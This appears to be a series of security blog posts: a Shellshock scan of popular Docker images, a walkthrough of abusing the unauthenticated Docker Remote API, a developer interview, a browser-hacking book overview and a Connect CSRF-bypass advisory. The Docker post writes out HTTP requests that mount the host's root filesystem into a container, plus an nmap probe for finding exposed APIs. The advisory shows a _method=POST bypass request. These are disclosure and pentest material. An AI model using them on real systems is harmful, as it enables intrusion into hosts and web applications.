Shellshock: a survey of Docker images

When I look at the whole Shellshock debacle I am mostly sad. Sad that one can exploit a bug in a piece of software from 1989 to hack internet-connected devices in 2014. I always have this naive hope that maybe, just maybe, not everything is hopelessly broken - which of course gets crushed every other week.

Enough ranting. This blog post is about a small research I've run last week on Docker and Shellshock. No, sorry, this is not yet another "product X is vulnerable to Shellshock if used in a dark night with a super moon" report. So, what is this about? To understand that, we need to do some homework.

Docker Images and you

One of the core concepts of Docker is the difference between an Image and a Container. The TL;DR;, slightly inaccurate version (I should not use Virtual Machine in this context but all readers will be familiars with VMs) can be broken down in two points:
  1. An Image is a "base", read only virtual machine template and a "Container" is a writable instance of that machine;
  2. Images can be chained in a hierarchy of inheritance where a Base image is modified generating a child image and so on. This is "the way" to build images, even though you can always build your own.
Here is an image deep linked from the Docker documentation, which should make things clearer.
As you can see the Debian Base Image has a couple of children before finally generating a writable container. The logic of Docker is such that you should not be "changing" the base image but rather "building on top" of it, adding new components. You surely can, but that would kill one of the key benefits of Docker - citing Red HatLightweight footprint and minimal overhead.

Another important piece of information is that Docker maintains its own repository of public images that anyone can download and use. Docker has some rather complicated concepts for indexes and registries but they don't help us here: suffice to say that in practice lots of users will download images from this "official" repository.

Some important implications for us security folks:

  • If a base image has a security bug, it is at least possible (if not likely) that all the children will inherit the same bug;
  • The logic with which developers most likely approach this model is "I won't have to worry about the base image". This has been somehow hinted at and while some experienced developers will take the need for updates into consideration, not everyone will;
  • People will download and build upon a set of images from Docker's repository. No, we will not hack that, stop being evil!

Yeah, OK. So, Shellshock and Docker?

Now that we have a shared passable understanding of how Images work in Docker, let's get to what I have done. Last week I wondered how many of the most popular Docker base images had been updated: Shellshock had significant press coverage, the kind of coverage that pushes my mum to ask me about "that problem they are talking about in the news", so I figured that most of the main images would have been updated by now. Have them?

To find out, I whipped together a small Python script (published on github) that downloads a list of Docker images in an host VM, downloads and runs a script on each one and then reports the results. Once I finally managed to get it working reliably (and I suspect Guido might have heard me cursing my inability with the language he designed as I longed for the forbidden PHP fruit) I run it against the 100 most popular Docker images published on Docker's repository. In a nutshell, my script simply downloads the image, runs bashcheck on it, and then reports back the results. Because of the way the integration is designed, it will only work on Debian based machines: this is an important point because it means that all my results are likely underestimating the actual numbers.

Many crashes of Virtual Box later, the results were back. 30 Images had at least one instance of the many bugs the Shellshock umbrella covered. The full results are in the repository with the script, and I'll summarize them later on, but a caveat first. There is no proof that containers using these images or derivates of those images can be exploited: the only thing my script detects is the lack of patching. Don't wear your tinfoil hats just yet.

Now, without further ado...

Things I have learnt scanning the 100 most popular Docker images

  • 30% of the top 100 images were still vulnerable to one of the shellshock bugs;
  • 4 of the top 30 were vulnerable, 1 in the top 10 - so around 10% of the really popular images;
  • None of the vulnerable images were "official, Docker maintained images", but some were based on them: those images were still vulnerable because they were not rebuilt after the patch had been applied on the base images. That is, using a base image that gets regularly updated is not enough;
  • Some of the vulnerable images have a consistent user base, or at least downloads. asher/remote_syslog has got almost 900.000 downloads;
  • Docker security team is really nice. I gave them an heads up (nothing for them to do here really, in terms of incident response, but a lot of long term work) and they were very direct about the issues and shared some nice insights. Thumbs up.
A synthetic summary of the shellshock related bugs I've found scanning on October 9th 2014

Things you should worry about

Pentesters never worry! If you are a pentester, you likely want to keep an eye out for usages of Docker images during a pentest. You might even want to ask container's configurations to discover vulnerabilities before you even start the test - it's wonderful to have bugs at day 0.

If you are on the other side of the security fence, though, Docker is coming for you: it's the new hotness and it's quite likely to pop up in your infrastructure in one form or another. The sooner you have a strategy in mind to update those containers, the better.

But wait, didn't we use to have the very same problem with virtual machines a few years ago? We still do. But we used to, too.
However I think there are some subtle but important differences here. As an admin or security person, you can't just SSH in the machine and "apt-get upgrade" it, then save a new snapshot. There is a whole chain of images that might get forked in various points, where some of the nodes might even be escaping your control. Updating images is a very real, known problem: the Docker security team told me they are looking into it so hopefully things are going to get better in the future, but for now you really want to have a story for managing updates. Possibly before the next Shellshock.

My humble view on things that could be improved

I should start by saying that I don't know nearly enough about Docker's infrastructure to have a complete view - and that making posts where you have to provide no solution to the problems you find is much easier. However, I think I realized two or three things while working on this:
  • Reporting bugs on Docker images is hard! Some of these images have tens of thousands of users but no bug tracker or no clear way to report security bugs. In some cases I've opened an issue in github and hoped for the best. Providing some kind of built-in bug reporting feature would be a nice to have in the registry, or maybe this could be brewed in Dockerfiles?
  • Old images are bad! When you look at an image in Docker's repository you have a clear indication of when it was built (or at least committed). Check out the Properties of itzg/minecraft-server: it has been built before the Shellshock bug was even discovered and it's based on an official base image. Now, given that we know what base images are vulnerable to bugs and when, it should be possible to simply assume that all the images that have been built before that as potentially vulnerable as well;
  • Custom images are a lot of work to maintain. On one of my bug reports the maintainer of the image just said "sure, I'll rebuild". Since he was using an official Debian build as a base image, it's not a lot of work on his side. Had he used a completely custom OS, he'd have to do a standard upgrade, which takes more and more time and effort as the image ages.

In conclusion...

A somewhat interesting percentage of images was found to be vulnerable during my tests, for a total of maybe a couple of millions downloads and thus potentially affected containers. The interesting takeaway for me, however, was that updating Docker images is subtly different and possibly more complex than updating VMs. I suspect this is something we'll have to deal with more and more in the future as containerized systems become widespread.

EDIT: I have been pointed this blog post which does a detailed analysis of some of the official Base Images - I have only pulled the Latest tag for each Image, so they got more coverage there. From a quick skim, none of the images I've found to be vulnerable were based on the images they flag in the article.

Abusing Docker's Remote APIs

Forewords: is this post about a security vulnerability?

Ultimately it's not. This is a short note on how to exploit a somehow under-documented feature in the Docker remote APIs, since I did not manage to find clear guidance elsewhere and had to experiment with it myself. The reason for sharing is to save you time during the next pentest. That said, do I think this is bad? Yes, I do, as I will explain later on.

EDIT:  It turns out maybe I wasn't so wrong worrying about this.
See this announcement.

So, what is this about?

TL;DR; The Docker's Remote APIs trivially allow anyone with access to them to obtain access to the file system of the host, by design, and are unauthenticated (but disabled) by default.

Docker is a container-based platform for application "shipment", but to be fair, the official what is Docker page does a better job at explaining what this is all about. Docker is all the rage in these days and if you have never heard of it you should really look it up. It's quite likely to show up in one of your next penetration tests since companies seem to be experimenting with it quite extensively.

Docker is usually managed via a command line tool, which connects to the Docker server via a Unix socket. Access is restricted to the root user by default or to an aptly named Docker group, at least on the Ubuntu packages I've experimented with. So far, so good (sort of, but I don't really have strong arguments here).

This is of course not very convenient if you are working in any environment but your bedroom, so the helpful devs have provided a RESTful API which can be bound to any HTTP port. It is not enabled by default, which is something worth stressing, but can be turned on via a flag (-H tcp://IP_ADRESS:PORT). IANA has assigned ports 2375 and 2376 to the cleartext and SSL protected versions of the APIs respectively.

Looking at the API reference you'll see the APIs support all the operations you'd expect in a VM-management tool. By default there is no authentication so all you need is finding the target (which you can fingerprint by hitting the /version endpoint) - unless, of course, the admin has enabled some other kind of protection. The simplest way to do so is to use Docker's tlsverify feature, and everyone should do that. However, given the process does not work on OsX, guess how many programmer's laptops you are going to pop?

Accessing the host file system

The trick is ultimately quite simple: you just start a new container (think of it as a VM and you won't be far off) with a special configuration, then access it. First, create a container on the host (I'm trying to keep the call small here):

POST /containers/create?name=cont_name HTTP/1.1
Content-Type: application/json
    {
      "Cmd": ["/bin/bash"],
      "Image":"ubuntu",
    }

You'll get back an ID for your container. Now, start the container: note that in my experiment I was able to make these "Binds" only work once, the first time a container is started.

POST /containers/$ID/start
Content-Type: application/json

 {
  "Binds":["/:/tmp:rw"]
 }

Now you have a running container where the /tmp directory maps back to the / of the host. You have to login to the container to go wild on the host, but since you don't have direct access to said poor host, you need to have SSHd running on your container. The default Ubuntu image won't have SSHd up, so you'll have to use a different image (consider baseimage-docker) or tweak around with the cmd - this very last part is left as an exercise for the reader... or scream at me enough in the comments and I'll come up with something. Alternatively, you could be able to use the copy endpoint (documentation of the copy endpoint) but I've not experimented with that.

Why this is worth writing about, or why I don't like un-authed admin interfaces

As I said at the beginning of the post, this writeup is mostly a time saver for those dealing with Docker during a penetration test. However, there is something that I don't like in the way Docker has gone about designing these APIs: the lack of any default auth entirely.

There are of course various reasons why you would ship such a critical feature with no authentication to be seen: time to market, the fact that after all it is disabled by default, or more likely the will to attain segregation of duties. Designing a secure authentication system is complicated, error prone and difficult, and ultimately not the role of an API. Delegating it is a better idea than botching it, so that it is clear where things go wrong.

I beg to disagree, and I'd have expected better from a company that produced such a well thought discussion on the security issues with running SSH on a container. I'm going to argue that there is a huge gap between having a clearly horrible authentication system and nothing at all. The sad truth, as anyone who has done any pentest in his career will tell, is that the vast majority of the end users will run with whatever was shipped out of the box. Security people cheered when Oracle started to require users to set passwords during installation instead of setting default ones (ok ok, that's a long story), and the experience of the Internet Census tells us how easy it is to forget to change that password, or to setup that auth.

Of course, security minded admins will set up things correctly and invest all the time needed to configure a secure environment. But what about the others? Was it so difficult to require a Basic Auth-powered password at startup?

Friction (as in, anything that makes your product harder to use) is bad, but pwned users are worse.

Bonus: Here is a simple nmap probe for the Docker APIs.

##############################NEXT PROBE##############################
# Queries Docker APIs for the /version url containing version information.
#
Probe TCP docker q|GET /version HTTP/1.1\r\n\r\n|
rarity 7
ports 2375
sslports 2376

match docker m|.*{"ApiVersion":"(.*)","Arch".*"GitCommit":"(.*)","GoVersion".*"Os":"(.*)","Version":"(.*)"}.*| p/Docker remote API/ v/$1/ o/$3/ i/GitCommit:$2 DockerVersion:$4/

Five questions with: Vincent Bénony (Hopper Disassembler)

In recent years, we have seen an increase of micro software-house building amazing security software and actively contributing to re-define how we do security. Personal projects quickly turning into powerful tools used by thousands of people to improve the security of many systems around the world. We live in exciting time, where a small team can build things that are going to shape the future of infosec. At NibbleSec, we support and celebrate those successes.

Today, we asked Vincent Bénony to talk about his experience with the Hopper Disassembler:

Q: Hi Vincent, would you mind telling us a little bit about yourself? How did you get into programming and security?

A: Hi! This is a long story...I started programming when I was very young, with the Oric Atmos (if any of you remember this computer). Back then, I was 7 and I’m not sure that I understood what I was doing. I continued on the Amiga, where I really discovered the assembly language with the Motorola 68000. By the way, these were my very first steps with reverse engineering. Like many other guys at that time, I started looking at the anti-copy schemes of games. Each time, it was a really fun challenge. Then, I moved to the demo scene and continued coding small demos. Naturally, I chose to study computer science at the university where, later on, I defended my PhD in the field of cryptography. That was the time when I got back to security and reverse engineering.

Q: When did you realize that Hopper was something more than a personal project? How did this happen?

A: I started working on Hopper as a hobby project, as I was not able to afford the price of an IDA license. At that time, I realized that I didn’t need to have such a powerful tool, and that only a few of IDA's features were really useful to me. Being a OS X user, I really don’t like the look-and-feel of most Qt applications as they're just a raw transposition of Windows versions; they feel like aliens in my OS, and most of the UX habits cannot be transposed to these UIs. Qt is a great toolkit - I love it, and I use it for the Linux version of Hopper - but I really think that each version has to be customized for the targeted OS… So, I decided to write a very little program to do interactive disassembly. And the project started to grow. It was developed at night, after my daily job, and when my children were sleeping :) And then, the Mac App Store was announced… It changed many things. A friend of mine - Hello Sebastien B. :) - told me that I should try to see if there are people interested in such an application on the Mac App Store. I really doubted at first, but I tried anyway… and then… a miracle. I rapidly encountered many people who were interested in the idea of a lightweight alternative of IDA for OS X. The project started to require a lot of time. I received a lot of very positive feedbacks from users, hence I had to make a choice between my job and Hopper…I decided that I had to take my chance. Today, I'm always amused when I look at the very first screenshots of Hopper. It helps me to measure the amount of work that has been done :)

Q: As a micro software company, what are the problems and opportunities?

A: Problems are multiple. First, the development of the software by itself represents only a small part of my day-to-day job. Commercializing a software is not just producing code. I have to deal with many things like the website, users support, legal aspects (accounting, taxes…), and even things that may sound anecdotical, but which take me a lot of time like drawing icons :) - btw, I’m clearly not a designer. That being said, this is only a matter of organization. And I’m always pleased to see that there are so many positive feedbacks! This is something that pushes me beyond my limits. I always try to communicate as much as I can about the software and its development. Many times, people are talking about the project on medias like Twitter, which is a really great tool to help me reaching out potentially interested people. Security conferences are also something that I’m trying to follow as much as I can. For instance, I'm trying to go to every conference in France: I’m almost sure to meet people who use this kind of software, and their feedback is always a great value! Most of the features that were added to Hopper v3 are things that were discussed with people I met in conferences like NoSuchCon in Paris.

Q: Being a one-person software company, how do you track and prioritize new features and bugs? Which software development model are you following? In other words, how do you make sure that you're working on something relevant?

A: I’m an academic person, hence, I was not really at ease with software development methods used by real companies. I don’t know how it works outside France, but the studies I followed were purely about the theoretical aspects of computer science and nothing else. I have a coherent vision of what I would like to reach with Hopper. I always read all messages that I receive from my customers and I write all ideas that are compatible with the initial view I had for my software on my todo list. I’m always trying to avoid mutating Hopper into something that pretends to fit the needs of everyone; I want it to be lightweight, and coherent. Once I filtered the features that I want to implement, I usually start with the most visible part, implementing bogus functional parts. This is a good way to have a rapid visual feedback. If the feature still makes sense according to my usual workflow, it is kept. I really need to see the progress on a feature, and starting with the visual parts helps me a lot! Another thing, I strongly believe that the only way to write something coherent is to be the first client of your software. I use Hopper a lot, for many things, even debugging Hopper itself :)

Q: What would you recommend to people starting or maintaing a security tool? Which business model would you recommend to turn a personal project into a sustainable source of income?

A: I'm not sure whether my very little experience in the field is really relevant. Evaluating simple things, like the product price, the targeted audience, and so on, is very difficult but it's something that needs to be done. After that, I really love to simulate things: I wrote tons of Python scripts to simulate the viability of my company for the next 10 years (with a lot of pessimistic hypothesis, to avoid future problems). If Hopper will continue to be a stable project is too soon to say, but I did my best to avoid jumps into the wild, with a no clear view on what I want to achieve. Anyway, deciding to work full-time on Hopper was one of the best thing that I've ever done: working on something stimulating is really awesome! Sometimes exhausting, but really awesome :)

An Overview of The Browser Hacker's Handbook

Writing a book is definitely a big and time-consuming task. After one year me, Wade Alcorn and Cristian Frichot finally released the Browser Hacker's Handbook in March 2014. Looking backwards at our git repository (I know it's not ideal to track binary file changes such as MS Word with git..), I counted more than 2300 commits, starting  5 December 2012 drafting the ToC and finishing 30 March 2014 with the creation of the https://browserhacker.com website.

Only after you write a book you can understand two things:
 - why your partner always deserves the first big THANKS
 - why you will not write another book for at least the next 5 years

Our adventure started when Wade and me were discussing about creating a BeEF training, to be presented at SysCan. Eventually we decided to switch to the book and maybe take care of the training later on (it's still in our overly long TODO list).

The Browser Hacker's Handbook (BHH) is the first book focused entirely on browser hacking from the attacker's perspective, which was something somehow missing so far (even Portswigger mentions that in the Web Application Hacker's Handbook 2nd edition). There are other books I personally recommend if you're interested in browser/web security, like The Tangled Web from Michał Zalewski and Web Application Obfuscation from Mario Heiderich (friend and BHH technical editor, kudos!) et al. Both of the books are great and technically deep, but none of them focus exclusively on the browser ecosystem and how it can be attacked, so there you go BHH :-)

Something worth noting is that this is not a book about BeEF, which is mentioned multiple times but it's not the focus of the book. Most of the code (see http://browserhacker.com/code/code_index.html) is pure JavaScript/Ruby, which you can use with your own browser hacking framework or something else different from BeEF. BeEF was mentioned throughout the book not only because Wade created it and I'm the lead core developer, but simply because there is no other open source tool at the moment that is mature enough (yeah, we're still in alpha..) and has the number of modules currently in BeEF. Many people around the world use BeEF professionally for social engineering and red-team assessments with success, demonstrating that BeEF is mature enough to be used during your own pentests. Even Jester modified it adding a bunch of 0days and other stuff, and was using it in the wild a while back: http://jesterscourt.cc/2012/07/04/project-looking-glass/ 

What we decided to do was to create the first browser hacking methodology that comes handy in red-team and social engineering engagements. The methodology can be summarized with the diagram below:
As you can see there is an entire chapter dedicated to each of these categories, and to be honest it wasn't that easy to categorize some of the attacks to be in a chapter rather than another one. For instance, we discuss multiple RCEs in various web applications in Chapter 9 (and how you can exploit them cross-origin from the hooked browser), but also in Chapter 10 when discussing the BeEF Bind shellcode technique. SOHO router attacks and some social engineering attacks are other examples of attack categories that can overlap in multiple chapters.

Initiating Control
The book starts with introducing control initiation techniques, a mandatory step if you want to have the target browser execute your malicious code. From the multiple types of XSS including DOM-based and Universal-XSS types, to social engineering attacks involving baiting and phishing (btw, you can do template-based mass-mailing and phishing all with BeEF), finishing with classic Man-in-the-Middle scenarios like ARP Spoofing, DNS Poisoning, Wi-Fi related things and so on. After experimenting with source code and attacks discussed in this chapters, you should have a solid grasp about how to start your browser hacking journey.

Retaining Control
You initiated control with the browser executing some code, most likely JavaScript: now you need to retain that control as longer as possible. Some attacks might need only one or two seconds to complete, others might take several seconds or minutes depending on their configuration. Additionally, you want to have a dynamic communication channel (in other words, bidirectional) in order to have the hooked browser extruding data to your server, and the server pushing new code to be executed by the browser. Communication techniques such as XMLHttpRequest polling, WebSockets and DNS Tunneling (yes, bidirectional and purely in the browser without using plugins) are discussed, as well as some persistence techniques like Overlay IFrames, pop-unders, browser events and more advanced Man-in-the-Browser attacks. The chapter finishes presenting examples on evading detection and playing with obfuscation, which can generally be resumed as the following pseudo-code:

Bypassing the SOP
The Same Origin Policy is probably the most important, inconsistently implemented, broken and bypassed security control in nowadays browsers. The chapter goes through many different SOP implementations in Java, Adobe Reader/Flash, Silverlight and multiple browsers, presenting some well-known and less-known quirks, bugs and bypasses (some of them not even patched or by-design). This chapter also analyzes UI redressing attacks such as Clickjacking, Cursorjacking, Filejacking, drag&drop tricks and provides some real-world examples about how to steal browser history. Bypassing the SOP is an optional step, as well as the next attacking phases. While you need to initiate and retain control, you might not need to bypass the SOP or attack web applications if your goal is to trick the user to install a backdoored Chrome extensions for instance. Going through the book, especially in Chapter 9 and 10, you will discover the multitude of attacks you can still deliver against web applications and networks without the need for a SOP bypass.

Attacking Users
Humans are often referred to as the weakest link in information security. Is it our inherent desire to be ‘helpful’? Perhaps it’s our inexperience. Or, is it simply our (often) misplaced trust in each other? Either way, social engineering users is always fun. The less they know about computers in general, the better, as they tend to click OK or ALLOW on any kind of real or spoofed user prompt you can create. This chapter introduces how to capture multiple types of user input via hooking JavaScript events. 

For instance a nice and easy attack, in case the browser was hooked via a post-auth XSS, is to create an overlay IFrame that loads the same-origin resource being the login page of the hooked origin. This IFrame has also a JavaScript keylogger attached to it: the user thinks his session just expired, so he enters his credentials, which are captured and sent back to us. At the same time this attack achieves some form of persistence, as the communication channel is running in the background while the user browses in the foreground overlay IFrame. Many other social engineering attacks are discussed such as Signed Java Applets, Fake Software Updates, Malicious Extensions, HTAs and other tricks on Internet Explorer.

Attacking Browsers
This chapter deals with attacking the browser itself. Before attacking it you want to exactly fingerprint which browser type and version is hooked. Fingerprinting through HTTP headers, DOM properties, software bugs and other quirks are discussed. Combining these fingerprinting techniques all together you can be almost sure that even if someone is spoofing his browser type/version, you get an accurate fingerprinting result. Cookies, protocol handlers (aka schemes) and the SSL/TLS layers are also discussed, with some examples of attacks and bypasses. The chapters ends with some analysis of heap exploitation in Firefox and other examples of how you can get shells if you find a bug in the browser JavaScript interpreter or HTML parser.

Attacking Extensions
Browser extensions always run in a privileged context, with higher privileges than for instance the normal context where JavaScript is executed when you browse to https://browserhacker.com. For this reason, if the extension is bugged, or if you can trick the user to install your malicious extension, it's usually game over. Firefox and Chrome extensions are discussed, including fingerprinting, spoofing, cross-context scripting and various RCEs. Remember that at the time of writing the book and this blog post, Firefox extensions do not run in a sandbox, so an XSS in the extension leads to RCE. Chrome extensions (especially with manifest version 2, which is the default right now) are less vulnerable, especially thanks to the adoption of the Content Security Policy, but the malicious/backdoored extension social engineering trick is still a viable option. Luca and me discussed this a while ago in this post: http://blog.nibblesec.org/2013/03/subverting-cloud-based-infrastructure.html

Attacking Plugins
In the previous years (well, months) before Click-to-Play was implemented in the Java plugin and on Chrome/Firefox, 0days on Java, Adobe Reader/Flash, RealPlayer, VLC and others were the preferred and easier way to create botnets. The exploitation of those bugs in the wild was pretty crazy. So far Internet Explorer and Safari are the only major browsers that still do not implement Click-to-Play, so plugin attacks are still quite possible with those browsers, but not really an option on Chrome/Firefox (unless you have a Click-to-Play bypass in your 0day collection). Multiple bypasses are discussed in the chapter, as well as other tricks you can use with VLC, ActiveX and Java.

Attacking Web Applications
The main concept behind BHH is abusing existing functionality of the browser ecosystem to subvert the system. This includes launching traditional web application attacks from the hooked browser, which effectively becomes a beachhead and a pivot point for the internal network. Something (probably not that well known) is that without a SOP bypass you can still send cross-origin requests without generating a preflight request. This happens obviously with GET, HEAD, but also with POST with certain content types such as text/plain, application/x-www-form-urlencoded and multipart/form-data. Such behavior is enough to carry on attacks where:
 - you need to "blindly" send the request: for example, you can exploit any XSRF, RCEs, DoS and so on cross-origin;
 - you need to infer on request/response timings: for example, you can exploit cross-origin any kind of  SQL injection using time-based blind attack vectors.
You can even detect and blindly exploit XSS cross-origin, damn! You can actually do so many things without a SOP bypass and working fully cross-origin, that you have to read the chapter to get a good grasp. You can even create a full HTTP/HTTPS proxy with just an XSS.

Attacking Networks
That last chapter of the book focus on attacking networks (mostly internal networks, but not limited to it), starting with various techniques to retrieve the internal IP address of the hooked browser, to ping sweeping, port scanning and fingerprinting. The main part of the chapter is devoted to IPC/IPX, Inter-protocol Communication and Exploitation. Basically you can communicate via HTTP with non-HTTP protocols like IRC, SIP, IMAP, and most ASCII protocols if two conditions are met:
 - the protocol implementation is tolerant to errors, meaning that it doesn't close the socket if you send garbage data;
 - the ability to encapsulate target protocol data into HTTP requests.
Generally speaking, when IPC works, you communicate with the target protocol sending a POST request with the body containing protocol commands. HTTP request headers are discarded as not-valid commands, but the POST body is actually executed.

In the book we exploit this behavior in order to send shellcode, the BeEF Bind shellcode originally written by Ty Miller for Windows and ported to Linux by Bart Leppens. BeEF Bind is a staging bind shellcode that acts like a minimal web server, returning the Access-Control-Allow-Origin: * HTTP response header and piping OS commands. In this way you can have the browser communicate via HTTP with the compromised box, and also a stealthier communication channel, as you can see in the diagram below:

So, this is the Browser Hacker's Handbook! Read it and experiment with the code at https://browserhacker.com if you're interested in hacking browsers, web application security, or if you need to secure your (web-)infrastructure. Your browsers and intranets have never been more exposed! :-)

Cheers
antisnatchor

Node.js Connect CSRF bypass abusing methodOverride middleware

In the previous post, I discussed the importance of well-written documentation and uncomplicated APIs suggesting that poor documentation and negligence should be considered as silent threats.

Almost a year ago, I reported the following issue to the Node.js Connect's maintainers. To me, this is a perfect example of the risks of an incomplete API documentation that doesn't clearly warn the user of potential side-effects. Please note that in the recent releases of Express, connect-csrf is now called csurf and methodOverride is now method-override. Different names, same API.

Disclosure timeline

This issue was reported to Senchalabs on 07/25/2013. Despite my requests to add a warning in the online documentation, there's still no indication of potential side-effects in Connect MethodOverride. On 09/07/2013, this advisory was also published by the NodeSecurity community. Unfortunately, I don't think that the issue raised the adequate level of attention as suggested by the many vulnerable applications that I've encountered.

Technical details

Connect’s methodOverride middleware allows an HTTP request to override the HTTP verb with the value of the _method post parameter or with the x-http-method-override header. As the declaration order of middlewares determines the execution stack in Connect, it is possible to abuse this functionality in order to bypass the standard Connect’s anti-CSRF protection.

Considering the following code:

... 
app.use express.csrf() 
... 
app.use express.methodOverride()

Connect’s CSRF middleware does not check CSRF tokens in case of idempotent verbs (GET/HEAD/OPTIONS, see csurf/index.js). As a result, it is possible to bypass the security control by sending a GET request with a POST MethodOverride header or parameter.

GET / HTTP/1.1 
[..] 
_method=POST

The workaround is clearly to disable methodOverride or make sure that it takes precedence over other middleware declarations.

Adam Baldwin made an eslint plugin that you can use to identify this issue.

Update 06/04: Douglas W. pointed out that it's probably a good idea to move to method-override version 2+ (https://www.npmjs.org/package/method-override#readme). The documentation has been updated with a reference to this issue.

On web frameworks, built-in security mechanisms and common pitfalls

Modern web application frameworks are expected to provide built-in security mechanisms against common flaws, such as Cross-Site Request Forgery and injection attacks. Developers can benefit from these protections as they don't need to create ad-hoc defense mechanisms and they can rather focus on building features.

Citing the OWASP Framework Security project
The most effective way to bring security capabilities to developers is to have them built into the framework.

Although built-in security features have clearly improved web security, using a framework doesn't necessarily guarantee a bullet-proof application. When theory and practice diverge, things can still go wrong:
  1. Frameworks are not immune to bugs. They are software. As such, they can be affected by security issues too. Security mechanisms can be bypassed or abused. 
  2. Poor or inconsistent documentation. Using appropriate APIs and invoking those calls in the right way is a crucial aspect for leveraging all security mechanisms. Unfortunately, the quality of the documentation doesn't always facilitate the job of developers. 
  3. Negligence. Developers still need to read (and understand) the documentation. Building secure software is complicated and requires in-depth understanding of all subtle details.
Although dealing with security issues in production environments is always painful, fixing application framework bugs is even more complicated.  As they usually impact an high number of websites, weaponized exploits are often available in a few hours after the disclosure. On the other side, not all vendors are sufficiently agile to provide a patch. Moreover, the resolution with homegrown fixes may not be trivial. Finally, developers and QA engineers do not necessarily have visibility on the actual code changes, thus they're forced to perform full regression testing to make sure that the application still works as expected.

Despite that, security bugs are generally the most evident problem. High impact security flaws in common frameworks generate Hacker News threads, flames in security mailing lists and even receive mainstream attention. Good developers and blue teams follow security mailing, vulnerability feeds and vendor announcements. The probability of stepping into an advisory is close to one.

On the contrary, poor documentation and negligence are silent threats. You won't find as many blog posts or security advisories talking about 'insecure' API usage or misconfigurations.
For instance, everyone in the security community uses the CVE acronym, but just few folks know what CCE stands for (btw, it's Common Configuration Enumeration).

Since the very first days, the CVE Editorial Board has recognized the need to address both software flaws (aka vulnerabilities) and mis-configurations (aka exposures). The CCE project is logical next step in the evolution of CVE to finally address the 'E' in CVE.

To reinforce my point, let's think together about real-life examples for each category:
  1. Frameworks are not immune to bugs. Apache Struts and the countless OGNL expressions code execution bugs (CVE-2014-0094CVE-2013-2251, CVE-2013-2135, CVE-2013-2134, CVE-2012-0838, ...), Ruby's Action Pack parsing flaw (CVE-2013-0156), Spring's Expression Language injections  (CVE-2011-2730), PHP Lavarel cookie forgery to RCE, ....and many others. Just a few examples off the top of my head
  2. Poor or inconsistent documentation. Scrypt API misuse, ... what else?..  PHP htmlspecialchars
  3. Negligence. Ruby Mass Assignment, Java SecureRandom, ...it's getting hard


It's up to us, the community.

Improving application security is not just discovering and fixing security bugs. It's making sure that we have the right foundations and we build secure software on top of that. We need to trust our tools and know how to use them.

Collaboration and open-source are crucial aspects to win this game. As Github successfully demonstrated, code collaboration is a fertile ground. Encouraging code review and transparency creates opportunities for developers and the security community to improve code quality and other software development artifacts - including documentation.

Inspire your company to contribute back to the open-source projects on which you rely. As a developer, spend time crafting easy-to-use APIs accompanied with clear documentation. If you're a security researcher, don't stop after you discover a bug: submit a patch and help the project to prevent similar issues. Small things that can really make the difference.